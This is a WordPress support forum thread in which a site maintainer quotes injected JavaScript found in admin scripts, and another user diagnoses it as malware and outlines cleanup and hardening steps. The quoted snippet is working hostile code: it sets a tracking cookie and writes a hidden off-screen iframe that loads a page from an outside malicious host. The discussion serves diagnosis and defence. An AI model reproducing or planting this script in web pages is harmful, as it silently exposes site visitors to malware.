virus on .js and .php: function Art_protection() {

  • Resolved NikolaStef

    (@nikolastef)


    10 years, 2 months ago

    hi all,

    website im working on for client was acting weird when trying to edit post, u cant go from text to visual mode, didnt show menu for some plugin and u cant “open/close” menu for plugins (where is plugin name in right corner, small triangle icon).

    when i inspect elements, it gave me some errors, most for .js and one for .php files, i accidently saw strange code inside one of them, its:

    /*
Copyright (C) 2007 Free Software Foundation, Inc. https://fsf.org/
*/
function Art_protection() {
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function takeOrlondo(name) {
 var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return nachos ? decodeURIComponent(nachos[1]) : undefined;
}
 var cookie = takeOrlondo('lirmanusik');
 if (cookie == undefined) {
  setCookie('lirmanusik', true, 259200);
document.write('<iframe src="https://buisirtuder.iluxcloud.com/signarudel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe>');
}
}
Art_protection();

    when i further inspect i saw that load-scripts.php are full with code like that, it have more than 1000 lines of code inside. and every of thise function start with

    /*
Copyright (C) 2007 Free Software Foundation, Inc. https://fsf.org/
*/
function Art_protection() {

    and end with

    Art_protection();

    when i pull that load-scripts.php from server inside is other code, normal for that file. there is no function with Art_protection.

    further on, i locate one of infected .js file pull from server with ftp, and delete all code that have art_protector inside, after that i push that “clean” file on server, but when i did inspect elements > source of that file again it show me again that there is that strange code, after that i deleted that file from server/host, but on inspect elements its still show like site is pulling it inside, even that file is no longer on server.

    i did disable all plugins, and it game me on inspect elements one error, its for that load-scripts.php file.

    all this is only on wp-admin part of server, all errors and problems.

    can any one tell me how can i fix this? any one had same problem, found fix? i did try to find on internet but i didnt problem like this, or solution.

    thank you

Viewing 2 replies - 1 through 2 (of 2 total)

  • Your site has been infected with malware, same as mine was. You’ll probably also find a series of malicious .php files located on your server with base64 code.

    If you look closely at the Javascript code, it’s creating a cookie on your browser to log visited websites, and it’s also creating an iframe, out of view of the browser window, that leads to a virus website:

    document.write('<iframe src="https://malicioussubdomain.infectedwebsite.com/dodgyfile.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe>');

    The malicious code keeps reappearing every time you delete it because the hacker sets up a cron-job (automatic task) that replaces the code periodically, and changes the malware address located in the iframe. This code will appear in every Javascript file on your server.

    You need to find the point of entry into your site. They could have exploited a number of things, poorly written or maliciously written plugins, themes or other CMS systems.

    In my case, I stupidly had an old version of ‘Gallery-project’ installed on my server, which they accessed.

    # Known exploit = [Fingerprint Match] [PHP POST Exploit]:
'/home/benaball/public_html/gallery/modules/exif/lib/490c.php'
# Script version check [OLD] [Gallery3 v3.0.6 < v3.0.9]:
'/home/benaball/public_html/gallery/modules/gallery/helpers/gallery.php'

    ^ Malware scan from my webhost

    What you should look into:
    1- If you’re with a web host, get them to do a malicious file scan using their WHM, you can also run a scan with Sucuri: https://sitecheck.sucuri.net/

    2- Read up on Hardening WordPress, here: (WordPress Codex – Hardening WordPress) and here: (Big JS Problem Hack – WordPress Forums)

    How I solved it (summary):
    – I exported my posts using WordPress’s export function.
    – Erased the server and reinstalled WordPress
    – Secured the installation with techniques listed in the Hardening WordPress codex
    – Secured my directories using .htaccess
    – Installed a number of security plugins
    – Imported my posts using WordPress’s import function.
    – Only installed plugins and themes from trusted developers
    – Cleared my cache on CloudFlare as it had saved old malicious versions of the Javascript on my site.

    Thread Starter NikolaStef

    (@nikolastef)

    thank you Ben for reply

    yes that is the same malware. i did try to fight with Wordfence Security plugin, it did menage to find all files that are infected but it didnt menage to fix it, it didnt help that this plugin even have database with “original” files for wordpress nad plugins.

    my problem is fixed now, with help of third party services online. he hire them and they menage to fix it.

    the problem was even bigger then we know, because they have told us that this malware have expanded to other websites on this host.

    overall i dont know what to say to anyone else that have problem with this malware, even u do what Ben had done and ty to fix it, or hire third party services to do job.

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘virus on .js and .php: function Art_protection() {’ is closed to new replies.